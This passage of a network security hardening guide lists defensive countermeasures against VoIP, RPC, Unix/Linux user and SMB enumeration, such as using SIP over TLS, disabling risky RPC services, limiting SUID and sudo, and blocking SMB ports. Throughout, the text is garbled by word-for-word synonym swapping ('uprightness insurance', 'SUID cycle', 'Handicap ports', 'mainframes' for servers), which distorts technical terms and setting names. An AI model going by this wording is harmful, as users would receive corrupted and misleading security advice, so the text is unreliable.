addresses. This guarantees that regardless of whether an aggressor
bargains a preshared key, she can only with significant effort access the
VPN.
8. VoIP(Voice over IP) Enumeration:
 This hack can be smothered by actualizing SIPS (SIP over TLS) and
confirming SIP queries and reactions (which can incorporate uprightness
insurance).
 The utilization of SIPS and the verification of reactions can stifle many
related hacks including eavesdropping and message or client pantomime.
 The utilization of digest confirmation joined with the utilization of TLS
between SIP telephones and SIP intermediaries can give a station through
which clients can safely validate inside their SIP domain.
 Voicemail messages can be changed over to message records and
parsed by ordinary spam channels. This can just shield clients from SPIT
voicemails.
9. RPC Enumeration:
 Try not to run rexd, users, or rwalld RPC administrations, since they are
of negligible utilization and give aggressors both valuable data and direct
admittance to your hosts.
 In high-security conditions, don’t offer any RPC administrations to the
public Internet. Because of the unpredictability of these administrations,
almost certainly, zero-day misuse contents will be accessible to assailants
before fixed data is delivered.
 To limit the danger of inner or confided in hacks against vital RPC
administrations, (for example, NFS segments, including statd, lockd, and
mountd), introduce the most recent seller security patches.
 Forcefully channel egress traffic, where conceivable, to guarantee that
regardless of whether an assault against an RPC administration is effective,
an associate back shell can’t be brought forth to the hacker.
10. Unix/Linux User Enumeration:
 Keep the kernel fixed and refreshed.
 Never run any service as root except if truly required, particularly the web,
information base, and record mainframes.
 SUID digit ought not to be set to any program which lets you getaway to
the shell.
 You should never set SUID cycle on any record
supervisor/compiler/mediator as an aggressor can undoubtedly
peruse/overwrite any documents present on the framework.
 Try not to give sudo rights to any program which lets you break to the
shell.
11. SMB Enumeration:
 Impair SMB convention on Web and DNS mainframes.
 Debilitate SMB convention web confronting mainframes.
 Handicap ports TCP 139 and TCP 445 utilized by the SMB convention.
 Restrict anonymous access through the RestrictNull Access parameter
from the Windows Registry.